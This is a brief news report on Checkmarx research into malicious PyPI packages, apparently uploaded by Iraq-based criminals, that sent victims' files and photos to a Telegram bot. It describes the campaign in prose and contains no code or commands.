Iraq-based cybercriminals have been deploying malicious Python packages through the popular PyPI repository, according to a report by cybersecurity firm Checkmarx. The attackers use these packages to exfiltrate sensitive user data, sending it to a Telegram chatbot linked to various cybercriminal activities based in Iraq. The bot, which has been active since 2022, contains over 90,000 messages and is involved in activities such as financial theft and purchasing social media engagements.
The malicious script embedded in the Python packages scans victims’ devices for files and photos with specific extensions before sending them to the attackers via Telegram. The user who uploaded these packages is known by the nickname “dsfsdfds.” Checkmarx researchers noted that the bot’s operators are likely based in Iraq and have been involved in multiple criminal operations.
Checkmarx gained access to the Telegram bot, allowing them to monitor its activities. This access revealed that some of the campaigns using these malicious packages were successful, indicating a well-established criminal ecosystem. The researchers uncovered that what initially seemed like isolated incidents of malicious activity were part of a broader, more organized effort.
While the full extent of the data stolen and the specific targets remain unclear, the findings highlight the significant threat posed by these malicious packages. Checkmarx’s report underscores the importance of vigilance and security in the open-source software community, as these cybercriminals continue to exploit popular platforms like PyPI for their nefarious activities.